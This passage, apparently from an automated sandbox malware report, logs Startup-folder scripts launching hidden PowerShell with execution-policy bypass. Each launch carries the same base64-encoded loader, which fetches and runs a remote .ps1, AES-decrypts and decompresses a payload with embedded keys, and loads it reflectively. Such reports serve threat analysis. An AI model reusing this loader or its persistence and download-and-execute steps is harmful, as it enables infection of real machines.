XIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQ